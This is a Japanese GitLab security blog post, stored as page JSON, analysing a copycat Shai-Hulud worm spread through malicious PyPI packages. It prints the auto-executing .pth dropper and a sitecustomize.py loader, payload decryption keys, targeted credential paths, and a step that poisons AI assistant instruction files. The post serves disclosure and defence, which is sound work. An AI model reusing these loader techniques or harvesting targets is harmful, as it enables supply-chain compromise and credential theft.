[{"data":1,"prerenderedAt":1807},["ShallowReactive",2],{"/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers":3,"navigation-ja-jp":1027,"banner-ja-jp":1444,"footer-ja-jp":1453,"blog-post-authors-ja-jp-Dinesh Bolkensteyn|Daniel Abeles":1694,"blog-related-posts-ja-jp-shai-hulud-copycat-campaign-targets-python-developers":1721,"blog-promotions-ja-jp":1745,"next-steps-ja-jp":1798},{"id":4,"title":5,"authors":6,"body":9,"category":1006,"date":1007,"description":1008,"extension":1009,"externalUrl":1010,"featured":1011,"heroImage":1012,"meta":1013,"navigation":1011,"path":1014,"seo":1015,"slug":1019,"stem":1020,"tags":1021,"template":1024,"updatedDate":1025,"__hash__":1026},"blogPosts/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers.md","PyPIタイポスクワッティングを悪用したShai-Hulud模倣攻撃、Python開発者を狙う",[7,8],"Dinesh Bolkensteyn","Daniel Abeles",{"type":10,"value":11,"toc":991},"minimark",[12,23,26,30,38,73,82,85,94,97,101,119,181,188,209,279,285,288,291,329,332,335,389,392,395,488,491,494,523,526,539,546,562,565,781,784,787,812,815,926,930,943,952,960,963,972,975,987],[13,14,15,16,22],"p",{},"GitLabの脆弱性リサーチチームは、PyPIを標的とした組織的なサプライチェーン攻撃を確認しました。この攻撃では、",[17,18,21],"a",{"href":19,"rel":20},"https://about.gitlab.com/ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",[],"Shai-Hulud","マルウェアのコピーが展開されています。悪意あるパッケージは5つ確認されており、Flask、Requests、NumPyを偽装したタイポスクワット4つと、武器化された正規プロジェクト1つが含まれます。これらのパッケージはインストール時にコードを実行し、インポートや関数呼び出しは不要です。また、自己増殖型の認証情報窃取ツールを内包しており、主要クラウドプロバイダー全般のCI/CD環境を標的としています。",[13,24,25],{},"GitLabが影響を受けるパッケージをいずれも使用していないことを確認しました。より広範なセキュリティコミュニティが適切に対応できるよう、調査結果を公開します。",[27,28,29],"h2",{"id":29},"攻撃の詳細",[13,31,32,33,37],{},"監視システムは、2026年6月7日、単一アカウント（",[34,35,36],"code",{},"elitexp","）から公開された悪意ある5つのPyPIパッケージを検知しました。そのうち4つはタイポスクワットです。",[39,40,41,57,65],"ul",{},[42,43,44,50,51,56],"li",{},[45,46,47],"strong",{},[34,48,49],{},"rlask"," と ",[45,52,53],{},[34,54,55],{},"tlask","：Flaskのタイポスクワット",[42,58,59,64],{},[45,60,61],{},[34,62,63],{},"rsquests","：Requestsのタイポスクワット",[42,66,67,72],{},[45,68,69],{},[34,70,71],{},"nhmpy","：NumPyのタイポスクワット",[13,74,75,76,81],{},"5つ目の ",[45,77,78],{},[34,79,80],{},"mflux-streamlit"," は、実際のユーザーを持つ正規プロジェクトです。攻撃者はタイポスクワット展開後、悪意あるバージョン0.0.3および0.0.4を公開することで、このプロジェクトを武器化しました。",[13,83,84],{},"攻撃者はまず、本物の最新リリースのバージョン番号（Flask 3.1.3、Requests 2.34.2、NumPy 2.4.6）と完全に一致するクリーンな「プローブ」バージョンを公開しました。これらが問題なくインデックスされると、攻撃者はワームのペイロードを組み込んだ新しいバージョンを公開しました。",[13,86,87,88,93],{},"これは模倣による展開です。Shai-Huludの背後にある集団TeamPCPは、2026年5月12日にワームのコードを",[17,89,92],{"href":90,"rel":91},"https://ramimac.me/teampcp/",[],"オープンソース化しました","。以来、独立した攻撃者がこのツールキットを入手し、新たなターゲットを狙う動きを追跡してきました。今回のキャンペーンにより、同じワームがPythonエコシステムへも展開されました。",[27,95,96],{"id":96},"技術分析",[98,99,100],"h3",{"id":100},"初期感染ベクター",[13,102,103,104,107,108,111,112,114,115,118],{},"元のnpmバリアントは ",[34,105,106],{},"preinstall"," スクリプトを使用していました。このキャンペーンでは別のアプローチを採用し、Pythonの ",[34,109,110],{},".pth"," ファイルメカニズムを悪用しています。Wheelパッケージは ",[34,113,110],{}," ファイルを同梱でき、Pythonは起動時にこれを自動的に処理するため、明示的なインポートは不要です。各悪意あるパッケージには ",[34,116,117],{},"rlask-setup.pth"," のようなファイルが含まれており、1行のドロッパーが記述されています。",[120,121,126],"pre",{"className":122,"code":123,"language":124,"meta":125,"style":125},"language-py shiki shiki-themes github-light","import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),\".bun_ran\");\n_O.path.exists(_G)or exec('import os as _o,subprocess as _s,urllib.request as _u...')\n","py","",[34,127,128,159],{"__ignoreMap":125},[129,130,133,137,141,144,147,149,152,156],"span",{"class":131,"line":132},"line",1,[129,134,136],{"class":135},"sD7c4","import",[129,138,140],{"class":139},"sgsFI"," os ",[129,142,143],{"class":135},"as",[129,145,146],{"class":139}," _O,tempfile ",[129,148,143],{"class":135},[129,150,151],{"class":139}," _T;_G=_O.path.join(_T.gettempdir(),",[129,153,155],{"class":154},"sYBdl","\".bun_ran\"",[129,157,158],{"class":139},");\n",[129,160,162,165,168,172,175,178],{"class":131,"line":161},2,[129,163,164],{"class":139},"_O.path.exists(_G)",[129,166,167],{"class":135},"or",[129,169,171],{"class":170},"sYu0t"," exec",[129,173,174],{"class":139},"(",[129,176,177],{"class":154},"'import os as _o,subprocess as _s,urllib.request as _u...'",[129,179,180],{"class":139},")\n",[13,182,183,184,187],{},"ドロッパーはシステムの一時ディレクトリ内のマーカーファイル（",[34,185,186],{},".bun_ran","）の存在を確認して再実行を防ぎ、次にGitHubからBun JavaScriptランタイムをダウンロードし、パッケージ内にバンドルされた5 MBの難読化されたJavaScriptペイロードを実行します。",[13,189,190,192,193,196,197,200,201,204,205,208],{},[34,191,49],{}," の初期バージョンには、バックアップの実行経路として ",[34,194,195],{},"sitecustomize.py"," ファイルも含まれていました。Pythonは起動時に ",[34,198,199],{},"sitecustomize"," を自動インポートし、このファイルは ",[34,202,203],{},"sys.path"," から隠し ",[34,206,207],{},"_index.js"," ペイロードを検索します。",[120,210,212],{"className":122,"code":211,"language":124,"meta":125,"style":125},"import subprocess, os, sys\nfor d in sys.path:\n  js = os.path.join(d, \"_index.js\")\n  if os.path.exists(js):\n    subprocess.run([\"node\", js])\n    break\n",[34,213,214,221,235,252,261,273],{"__ignoreMap":125},[129,215,216,218],{"class":131,"line":132},[129,217,136],{"class":135},[129,219,220],{"class":139}," subprocess, os, sys\n",[129,222,223,226,229,232],{"class":131,"line":161},[129,224,225],{"class":135},"for",[129,227,228],{"class":139}," d ",[129,230,231],{"class":135},"in",[129,233,234],{"class":139}," sys.path:\n",[129,236,238,241,244,247,250],{"class":131,"line":237},3,[129,239,240],{"class":139},"  js ",[129,242,243],{"class":135},"=",[129,245,246],{"class":139}," os.path.join(d, ",[129,248,249],{"class":154},"\"_index.js\"",[129,251,180],{"class":139},[129,253,255,258],{"class":131,"line":254},4,[129,256,257],{"class":135},"  if",[129,259,260],{"class":139}," os.path.exists(js):\n",[129,262,264,267,270],{"class":131,"line":263},5,[129,265,266],{"class":139},"    subprocess.run([",[129,268,269],{"class":154},"\"node\"",[129,271,272],{"class":139},", js])\n",[129,274,276],{"class":131,"line":275},6,[129,277,278],{"class":135},"    break\n",[13,280,281,282,284],{},"攻撃者は後のバージョンでこのバックアップメカニズムを削除し、",[34,283,110],{}," アプローチ単独で十分と判断したようです。",[98,286,287],{"id":287},"ペイロードの難読化",[13,289,290],{},"JavaScriptペイロードは3層で難読化されています。",[292,293,294,311,318],"ol",{},[42,295,296,297,300,301,304,305,307,308,310],{},"整数配列に適用された ",[45,298,299],{},"ROT-N文字暗号","（ローテーション値はパッケージによって異なります：",[34,302,303],{},"rlask@3.1.4"," はROT-13、",[34,306,63],{}," はROT-17、",[34,309,55],{}," はROT-25）",[42,312,313,314,317],{},"ハードコードされた鍵を使用した ",[45,315,316],{},"AES-128-GCM暗号化","（2つの暗号化ブロブを生成）",[42,319,320,321,324,325,328],{},"内部ペイロードへの標準的な ",[45,322,323],{},"変数名マングリング","（",[34,326,327],{},"_0x"," プレフィックス難読化）",[13,330,331],{},"コードを実行することなく、静的解析によってペイロードを復号しました。最初のブロブ（907バイト）はBunランタイムダウンローダーです。2番目のブロブ（772 KB）は完全なShai-Hulud認証情報窃取ツールで、2,538個のハードコードされた文字列を含んでいます。",[13,333,334],{},"独自に解析を行う研究者向けに、AES復号鍵を以下に示します。",[336,337,338,355],"table",{},[339,340,341],"thead",{},[342,343,344,349,352],"tr",{},[345,346,348],"th",{"align":347},"left","レイヤー",[345,350,351],{"align":347},"鍵",[345,353,354],{"align":347},"IV",[356,357,358,374],"tbody",{},[342,359,360,364,369],{},[361,362,363],"td",{"align":347},"Bunダウンローダー",[361,365,366],{"align":347},[34,367,368],{},"c95506221d18936328fbc7ddcd21e3dd",[361,370,371],{"align":347},[34,372,373],{},"48da5faeafac0ac88a410bb0",[342,375,376,379,384],{},[361,377,378],{"align":347},"ワームペイロード",[361,380,381],{"align":347},[34,382,383],{},"7557c4e782a0622159476d1ea10d5236",[361,385,386],{"align":347},[34,387,388],{},"55a7d25e0e61b77cc175bcc3",[98,390,391],{"id":391},"認証情報の収集",[13,393,394],{},"起動後、ワームは主要なクラウドおよびCI/CDプラットフォーム全般の認証情報を狙います。",[39,396,397,407,417,423,429,446,452,458,464,470,476,482],{},[42,398,399,402,403,406],{},[45,400,401],{},"GitHub Actions","：",[34,404,405],{},"GITHUB_TOKEN","、パーソナルアクセストークン、きめ細かいトークン、OIDCトークン、組織・リポジトリのシークレット、Actionsアーティファクト、Runnerプロセスメモリ",[42,408,409,412,413,416],{},[45,410,411],{},"AWS","：IAMアクセスキー、シークレットキー、セッショントークン、IMDSインスタンス認証情報（",[34,414,415],{},"169[.]254[.]169[.]254","）、Secrets Managerエントリ、SSMパラメータ、STS連携トークン",[42,418,419,422],{},[45,420,421],{},"Azure","：クライアントシークレット、マネージドIDトークン、Key Vaultシークレット、フェデレーテッド認証情報、Microsoft Graph APIトークン",[42,424,425,428],{},[45,426,427],{},"GCP","：サービスアカウントキー、アプリケーションデフォルト認証情報、クラウドプラットフォームスコープトークン",[42,430,431,434,435,438,439,438,442,445],{},[45,432,433],{},"HashiCorp Vault","：7つの既知のファイルシステムパス（",[34,436,437],{},"/var/run/secrets/vault-token","、",[34,440,441],{},"/etc/vault/token",[34,443,444],{},"/root/.vault-token"," など）からのVaultトークン、APIアクセス、Kubernetes Vault認証",[42,447,448,451],{},[45,449,450],{},"npm / JFrog","：npmトークン、JFrog/Artifactory APIキー、OIDCトークン交換",[42,453,454,457],{},[45,455,456],{},"PyPI","：公開トークン、OIDCミントトークン",[42,459,460,463],{},[45,461,462],{},"RubyGems","：APIキー、gem公開認証情報",[42,465,466,469],{},[45,467,468],{},"SSH","：ラテラルムーブメントのための秘密鍵",[42,471,472,475],{},[45,473,474],{},"Kubernetes","：サービスアカウントトークン、kubeconfigファイル",[42,477,478,481],{},[45,479,480],{},"Sigstore","：OIDCトークンとFulcio署名証明書（攻撃者が信頼されたIDでアーティファクトに署名可能になります）",[42,483,484,487],{},[45,485,486],{},"データベース","：MongoDB、MySQL、PostgreSQL、Redisのパスワードが埋め込まれた接続文字列",[98,489,490],{"id":490},"自己増殖",[13,492,493],{},"元のnpmバリアントと同様に、これは単なる窃取ツールではありません。自己増殖します。窃取した認証情報を使用して、ワームは以下の動作を行います。",[39,495,496,503,509,512,515],{},[42,497,498,499,502],{},"アクセス可能なGitHubリポジトリに ",[34,500,501],{},".github/setup.js"," とワークフローファイルをコミットし、他のCIパイプラインでワームを再実行させます",[42,504,505,508],{},[34,506,507],{},".github/copilot-instructions.md"," を注入してAIコードアシスタントを汚染します",[42,510,511],{},"窃取したレジストリトークンを使用して、PyPI、npm、RubyGemsに追加の汚染パッケージを公開します",[42,513,514],{},"sudoersルールを注入してセルフホスト型CIランナーへの権限昇格を試みます",[42,516,517,522],{},[17,518,521],{"href":519,"rel":520},"https://github.com/step-security/harden-runner",[],"StepSecurityのharden-runner","の存在を確認し、検出された場合は動作を変更します",[98,524,525],{"id":525},"攻撃者について",[13,527,528,529,531,532,534,535,538],{},"5つのパッケージはすべてPyPIアカウント ",[34,530,36],{}," が所有しています。このアカウントは2024年11月に正規パッケージ（",[34,533,80],{},"：GitHubに11スターを持つStreamlit製画像生成UI）とともに作成されました。関連するGitHubアカウント（",[34,536,537],{},"github[.]com/elitexp","）は13年以上前に作成されており、大学のコースワークやLaravelプロジェクトを含む43の公開リポジトリを持っています。",[13,540,541,542,545],{},"アップロードメタデータによると、すべてのパッケージはユーザーエージェントとして ",[34,543,544],{},"Bun/1.3.14"," を使用して公開されています。これはマルウェアが実行チェーンの一部としてダウンロードするランタイムと同じです。",[13,547,548,549,551,552,555,556,558,559,561],{},"攻撃者は ",[34,550,80],{}," 自体も武器化しました。バージョン0.0.1と0.0.2はクリーンですが、タイポスクワットキャンペーンの後、15:23と15:37 UTCに公開された ",[45,553,554],{},"バージョン0.0.3と0.0.4"," には、同じ ",[34,557,110],{}," ドロッパーと難読化されたペイロードが含まれています。これにより、典型的なタイポスクワットよりも危険な攻撃となっています。",[34,560,80],{}," は既存ユーザーを持つ実在のプロジェクトであり、これらのユーザーは通常の依存関係解決を通じて汚染されたアップデートを受け取る可能性があります。",[27,563,564],{"id":564},"侵害の痕跡",[336,566,567,580],{},[339,568,569],{},[342,570,571,574,577],{},[345,572,573],{"align":347},"種別",[345,575,576],{"align":347},"インジケーター",[345,578,579],{"align":347},"説明",[356,581,582,595,606,618,630,642,659,673,685,696,709,721,733,745,757,770],{},[342,583,584,587,592],{},[361,585,586],{"align":347},"package",[361,588,589,591],{"align":347},[34,590,49],{}," 3.1.4-3.1.7",[361,593,594],{"align":347},"悪意あるFlaskタイポスクワット",[342,596,597,599,604],{},[361,598,586],{"align":347},[361,600,601,603],{"align":347},[34,602,55],{}," 3.1.4",[361,605,594],{"align":347},[342,607,608,610,615],{},[361,609,586],{"align":347},[361,611,612,614],{"align":347},[34,613,63],{}," 2.34.3",[361,616,617],{"align":347},"悪意あるRequestsタイポスクワット",[342,619,620,622,627],{},[361,621,586],{"align":347},[361,623,624,626],{"align":347},[34,625,71],{}," 2.4.7",[361,628,629],{"align":347},"悪意あるNumPyタイポスクワット",[342,631,632,634,639],{},[361,633,586],{"align":347},[361,635,636,638],{"align":347},[34,637,80],{}," 0.0.3, 0.0.4",[361,640,641],{"align":347},"武器化された正規パッケージ",[342,643,644,647,652],{},[361,645,646],{"align":347},"file",[361,648,649],{"align":347},[34,650,651],{},"{package}-setup.pth",[361,653,654,655,658],{"align":347},"自動実行ドロッパー（SHA256: ",[34,656,657],{},"6506d317...","）",[342,660,661,663,667],{},[361,662,646],{"align":347},[361,664,665],{"align":347},[34,666,195],{},[361,668,669,670,672],{"align":347},"バックアップ自動実行（",[34,671,49],{}," のみ存在）",[342,674,675,677,682],{},[361,676,646],{"align":347},[361,678,679],{"align":347},[34,680,681],{},"{package}/_index.js",[361,683,684],{"align":347},"難読化されたワームペイロード（5.2 MB）",[342,686,687,689,693],{},[361,688,646],{"align":347},[361,690,691],{"align":347},[34,692,186],{},[361,694,695],{"align":347},"システム一時ディレクトリ内の実行マーカー",[342,697,698,701,706],{},[361,699,700],{"align":347},"network",[361,702,703],{"align":347},[34,704,705],{},"hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip",[361,707,708],{"align":347},"Bunランタイムのダウンロード",[342,710,711,713,718],{},[361,712,700],{"align":347},[361,714,715],{"align":347},[34,716,717],{},"hxxps[://]upload[.]pypi[.]org/legacy/",[361,719,720],{"align":347},"ワームによる汚染PyPIパッケージの公開",[342,722,723,725,730],{},[361,724,700],{"align":347},[361,726,727],{"align":347},[34,728,729],{},"hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/",[361,731,732],{"align":347},"AWS IMDS認証情報の窃取",[342,734,735,737,742],{},[361,736,700],{"align":347},[361,738,739],{"align":347},[34,740,741],{},"hxxps[://]login[.]microsoftonline[.]com/",[361,743,744],{"align":347},"Azure ADトークンの取得",[342,746,747,749,754],{},[361,748,700],{"align":347},[361,750,751],{"align":347},[34,752,753],{},"hxxps[://]fulcio[.]sigstore[.]dev",[361,755,756],{"align":347},"Sigstore証明書のリクエスト",[342,758,759,762,767],{},[361,760,761],{"align":347},"actor",[361,763,764,766],{"align":347},[34,765,36],{}," (PyPI)",[361,768,769],{"align":347},"パッケージ所有者",[342,771,772,774,778],{},[361,773,761],{"align":347},[361,775,776],{"align":347},[34,777,544],{},[361,779,780],{"align":347},"アップロード時のユーザーエージェント",[27,782,783],{"id":783},"影響を受けた場合の対処法",[13,785,786],{},"これらのパッケージのいずれかがお使いの環境にインストールされている場合：",[292,788,789,795,798,806,809],{},[42,790,791,792,794],{},"パッケージを直ちに削除し、システムの一時ディレクトリ内の ",[34,793,186],{}," マーカーファイルを確認してください。",[42,796,797],{},"パッケージがインストールされた環境でアクセス可能だったすべての認証情報をローテーションしてください。CI/CDトークン、クラウドプロバイダーの認証情報、SSHキー、レジストリ公開トークンが含まれます。",[42,799,800,801,438,803,805],{},"GitHubリポジトリで予期しないコミット（特に ",[34,802,501],{},[34,804,507],{},"、または変更されたワークフローファイルに一致するもの）を監査してください。",[42,807,808],{},"パッケージレジストリアカウント（PyPI、npm、RubyGems）で公開していないパッケージがないか確認してください。",[42,810,811],{},"CI/CDパイプラインのログで予期しないBunのダウンロードやJavaScriptの実行がないか確認してください。",[27,813,814],{"id":814},"タイムライン",[336,816,817,827],{},[339,818,819],{},[342,820,821,824],{},[345,822,823],{"align":347},"日時",[345,825,826],{"align":347},"イベント",[356,828,829,837,851,862,870,878,889,897,905,918],{},[342,830,831,834],{},[361,832,833],{"align":347},"2026-05-12",[361,835,836],{"align":347},"TeamPCPがShai-Huludワームをオープンソース化",[342,838,839,842],{},[361,840,841],{"align":347},"2026-06-07 13:47 UTC",[361,843,844,845,438,848,658],{"align":347},"プローブバージョン公開（",[34,846,847],{},"rlask@3.1.3",[34,849,850],{},"rsquests@2.34.2",[342,852,853,856],{},[361,854,855],{"align":347},"2026-06-07 14:20 UTC",[361,857,858,859,861],{"align":347},"最初の悪意あるバージョン（",[34,860,303],{},"）を28秒以内に検知",[342,863,864,867],{},[361,865,866],{"align":347},"2026-06-07 14:24 UTC",[361,868,869],{"align":347},"自動解析完了、悪意あり/重大として分類",[342,871,872,875],{},[361,873,874],{"align":347},"2026-06-07 14:27-15:04 UTC",[361,876,877],{"align":347},"4つのパッケージ名全体でさらに6つの悪意あるバージョンが公開",[342,879,880,883],{},[361,881,882],{"align":347},"2026-06-07 15:23-15:37 UTC",[361,884,885,886,888],{"align":347},"攻撃者が自身の正規パッケージ ",[34,887,80],{}," を武器化（v0.0.3、v0.0.4）",[342,890,891,894],{},[361,892,893],{"align":347},"2026-06-07",[361,895,896],{"align":347},"静的解析により完全なShai-Huludワームを確認",[342,898,899,902],{},[361,900,901],{"align":347},"2026-06-07 16:01 UTC",[361,903,904],{"align":347},"すべての悪意あるパッケージをPyPIセキュリティチームに報告",[342,906,907,910],{},[361,908,909],{"align":347},"2026-06-08 03:15:06 UTC",[361,911,912,917],{"align":347},[17,913,916],{"href":914,"rel":915},"https://advisories.gitlab.com/",[],"GitLab Advisory Database","にアドバイザリを追加",[342,919,920,923],{},[361,921,922],{"align":347},"2026-06-08",[361,924,925],{"align":347},"PyPIが悪意あるパッケージのすべてのリリースを削除",[27,927,929],{"id":928},"gitlabを活用したパッケージの検出方法","GitLabを活用したパッケージの検出方法",[13,931,932,933,938,939,942],{},"GitLab Ultimateをご利用の場合、",[17,934,937],{"href":935,"rel":936},"https://docs.gitlab.com/ja-jp/user/application_security/dependency_scanning/",[],"Dependency Scanning","を使用して、プロジェクト内のこれらのパッケージへの露出を自動的に検出できます。",[17,940,916],{"href":914,"rel":941},[],"に、5つのパッケージすべてを対象とするアドバイザリ（GMS-2026-572〜GMS-2026-576）を申請しています。マージされると、Dependency Scanningが有効なプロジェクトのパイプライン結果と脆弱性レポートにこれらのパッケージがフラグ表示されます。",[13,944,945,946,951],{},"複数のリポジトリを管理するチームには、Security Analyst Agentを備えた",[17,947,950],{"href":948,"rel":949},"https://docs.gitlab.com/ja-jp/user/gitlab_duo_chat/",[],"GitLab Duo Chat","を使用した迅速なトリアージをお勧めします。次のような質問を試してください。",[39,953,954,957],{},[42,955,956],{},"「Shai-Hulud PyPIキャンペーンの影響を受けている依存関係はありますか？」",[42,958,959],{},"「このプロジェクトに悪意あるPython依存関係はありますか？」",[27,961,962],{"id":962},"今後の見通し",[13,964,965,966,968,969,971],{},"TeamPCPが5月にShai-Huludワームをオープンソース化した後、このキャンペーンを予測していました。独立した攻撃者がツールキットを入手し、新たなエコシステムに展開しています。Pythonバリアントは異なる初期感染ベクター（",[34,967,106],{}," スクリプトではなく ",[34,970,110],{}," ファイル）を使用していますが、同じ認証情報収集および自己増殖のコードを内包しています。",[13,973,974],{},"監視システムはnpm、PyPI、その他のレジストリ全般での模倣展開を継続して追跡しています。新たな情報が入り次第、この記事を更新します。",[976,977,978],"blockquote",{},[13,979,980,981,986],{},"脆弱性リサーチチームのその他の記事は、",[17,982,985],{"href":983,"rel":984},"https://about.gitlab.com/ja-jp/blog/categories/security-labs/",[],"Security Labsサイト","でご覧いただけます。",[988,989,990],"style",{},"html pre.shiki code .sD7c4, html code.shiki .sD7c4{--shiki-default:#D73A49}html pre.shiki code .sgsFI, html code.shiki .sgsFI{--shiki-default:#24292E}html pre.shiki code .sYBdl, html code.shiki .sYBdl{--shiki-default:#032F62}html pre.shiki code .sYu0t, html code.shiki .sYu0t{--shiki-default:#005CC5}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":125,"searchDepth":161,"depth":161,"links":992},[993,994,1001,1002,1003,1004,1005],{"id":29,"depth":161,"text":29},{"id":96,"depth":161,"text":96,"children":995},[996,997,998,999,1000],{"id":100,"depth":237,"text":100},{"id":287,"depth":237,"text":287},{"id":391,"depth":237,"text":391},{"id":490,"depth":237,"text":490},{"id":525,"depth":237,"text":525},{"id":564,"depth":161,"text":564},{"id":783,"depth":161,"text":783},{"id":814,"depth":161,"text":814},{"id":928,"depth":161,"text":929},{"id":962,"depth":161,"text":962},"security-labs","2026-06-09","GitLabの脆弱性リサーチチームが、PyPIを標的とした新たなPythonサプライチェーン攻撃を発見しました。悪意あるパッケージがShai-Huludワームを展開し、主要なクラウドプロバイダーのCI/CDシステムから認証情報を窃取します。","md",null,true,"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png",{},"/ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers",{"config":1016,"title":5,"ogImage":1018,"description":1008},{"noIndex":1017},false,"https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/v1772630163/akp8ly2mrsfrhsb0liyb.webp","shai-hulud-copycat-campaign-targets-python-developers","ja-jp/blog/shai-hulud-copycat-campaign-targets-python-developers",[1022,1023],"security","security releases","BlogPost","2026-06-10","678FGu748nrakVHG3l2-lullt-ODiZtOImpqBMfBr3A",{"logo":1028,"freeTrial":1033,"sales":1038,"login":1043,"items":1048,"search":1364,"minimal":1397,"duo":1414,"switchNav":1423,"pricingDeployment":1434},{"config":1029},{"href":1030,"dataGaName":1031,"dataGaLocation":1032},"/ja-jp/","gitlab logo","header",{"text":1034,"config":1035},"無料トライアルを開始",{"href":1036,"dataGaName":1037,"dataGaLocation":1032},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/ja-jp&glm_content=default-saas-trial/","free trial",{"text":1039,"config":1040},"お問い合わせはこちら",{"href":1041,"dataGaName":1042,"dataGaLocation":1032},"/ja-jp/sales/","sales",{"text":1044,"config":1045},"サインイン",{"href":1046,"dataGaName":1047,"dataGaLocation":1032},"https://gitlab.com/users/sign_in/","sign in",[1049,1078,1180,1185,1288,1344],{"text":1050,"config":1051,"menu":1053},"プラットフォーム",{"dataNavLevelOne":1052},"platform",{"type":1054,"columns":1055},"cards",[1056,1062,1070],{"title":1050,"description":1057,"link":1058},"DevSecOpsに特化したインテリジェントオーケストレーションプラットフォーム",{"text":1059,"config":1060},"プラットフォームの詳細はこちら",{"href":1061,"dataGaName":1052,"dataGaLocation":1032},"/ja-jp/platform/",{"title":1063,"description":1064,"link":1065},"GitLab Duo Agent Platform","ソフトウェアライフサイクル全体を支えるエージェント型AI",{"text":1066,"config":1067},"GitLab Duoのご紹介",{"href":1068,"dataGaName":1069,"dataGaLocation":1032},"/ja-jp/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":1071,"description":1072,"link":1073},"GitLabが選ばれる理由","エンタープライズがGitLabを選ぶ主な理由をご覧ください",{"text":1074,"config":1075},"詳細はこちら",{"href":1076,"dataGaName":1077,"dataGaLocation":1032},"/ja-jp/why-gitlab/","why gitlab",{"text":1079,"left":1011,"config":1080,"menu":1082},"製品",{"dataNavLevelOne":1081},"solutions",{"type":1083,"link":1084,"columns":1088,"feature":1159},"lists",{"text":1085,"config":1086},"すべてのソリューションを表示",{"href":1087,"dataGaName":1081,"dataGaLocation":1032},"/ja-jp/solutions/",[1089,1114,1137],{"title":1090,"description":1091,"link":1092,"items":1097},"自動化","CI/CDと自動化でデプロイを加速",{"config":1093},{"icon":1094,"href":1095,"dataGaName":1096,"dataGaLocation":1032},"AutomatedCodeAlt","/ja-jp/solutions/delivery-automation/","automated software delivery",[1098,1102,1105,1110],{"text":1099,"config":1100},"CI/CD",{"href":1101,"dataGaLocation":1032,"dataGaName":1099},"/ja-jp/solutions/continuous-integration/",{"text":1063,"config":1103},{"href":1068,"dataGaLocation":1032,"dataGaName":1104},"gitlab duo agent platform - product menu",{"text":1106,"config":1107},"ソースコード管理",{"href":1108,"dataGaLocation":1032,"dataGaName":1109},"/ja-jp/solutions/source-code-management/","Source Code Management",{"text":1111,"config":1112},"自動化されたソフトウェアデリバリー",{"href":1095,"dataGaLocation":1032,"dataGaName":1113},"Automated software delivery",{"title":1115,"description":1116,"link":1117,"items":1122},"セキュリティ","セキュリティを犠牲にすることなくコード作成を高速化",{"config":1118},{"href":1119,"dataGaName":1120,"dataGaLocation":1032,"icon":1121},"/ja-jp/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[1123,1127,1132],{"text":1124,"config":1125},"アプリケーションセキュリティテスト",{"href":1119,"dataGaName":1126,"dataGaLocation":1032},"Application security testing",{"text":1128,"config":1129},"ソフトウェアサプライチェーンセキュリティ",{"href":1130,"dataGaLocation":1032,"dataGaName":1131},"/ja-jp/solutions/supply-chain/","Software supply chain security",{"text":1133,"config":1134},"ソフトウェアコンプライアンス",{"href":1135,"dataGaName":1136,"dataGaLocation":1032},"/ja-jp/solutions/software-compliance/","software compliance",{"title":1138,"link":1139,"items":1144},"測定",{"config":1140},{"icon":1141,"href":1142,"dataGaName":1143,"dataGaLocation":1032},"DigitalTransformation","/ja-jp/solutions/visibility-measurement/","visibility and measurement",[1145,1149,1154],{"text":1146,"config":1147},"可視性と測定",{"href":1142,"dataGaLocation":1032,"dataGaName":1148},"Visibility and Measurement",{"text":1150,"config":1151},"バリューストリーム管理",{"href":1152,"dataGaLocation":1032,"dataGaName":1153},"/ja-jp/solutions/value-stream-management/","Value Stream Management",{"text":1155,"config":1156},"分析とインサイト",{"href":1157,"dataGaLocation":1032,"dataGaName":1158},"/ja-jp/solutions/analytics-and-insights/","Analytics and insights",{"title":1160,"type":1083,"items":1161},"GitLabが活躍する場所",[1162,1168,1174],{"text":1163,"config":1164},"大企業",{"icon":1165,"href":1166,"dataGaLocation":1032,"dataGaName":1167},"Building","/ja-jp/enterprise/","enterprise",{"text":1169,"config":1170},"スモールビジネス",{"icon":1171,"href":1172,"dataGaLocation":1032,"dataGaName":1173},"Work","/ja-jp/small-business/","small business",{"text":1175,"config":1176},"公共部門",{"icon":1177,"href":1178,"dataGaLocation":1032,"dataGaName":1179},"Organization","/ja-jp/solutions/public-sector/","public sector",{"text":1181,"config":1182},"価格",{"href":1183,"dataGaName":1184,"dataGaLocation":1032,"dataNavLevelOne":1184},"/ja-jp/pricing/","pricing",{"text":1186,"config":1187,"menu":1189},"関連リソース",{"dataNavLevelOne":1188},"resources",{"type":1083,"link":1190,"columns":1194,"feature":1277},{"text":1191,"config":1192},"すべてのリソースを表示",{"href":1193,"dataGaName":1188,"dataGaLocation":1032},"/ja-jp/resources/",[1195,1228,1250],{"title":1196,"items":1197},"はじめに",[1198,1203,1208,1213,1218,1223],{"text":1199,"config":1200},"インストール",{"href":1201,"dataGaName":1202,"dataGaLocation":1032},"/ja-jp/install/","install",{"text":1204,"config":1205},"クイックスタートガイド",{"href":1206,"dataGaName":1207,"dataGaLocation":1032},"/ja-jp/get-started/","quick setup checklists",{"text":1209,"config":1210},"学ぶ",{"href":1211,"dataGaLocation":1032,"dataGaName":1212},"https://university.gitlab.com/","learn",{"text":1214,"config":1215},"製品ドキュメント",{"href":1216,"dataGaName":1217,"dataGaLocation":1032},"https://docs.gitlab.com/","product documentation",{"text":1219,"config":1220},"ベストプラクティスビデオ",{"href":1221,"dataGaName":1222,"dataGaLocation":1032},"/ja-jp/getting-started-videos/","best practice 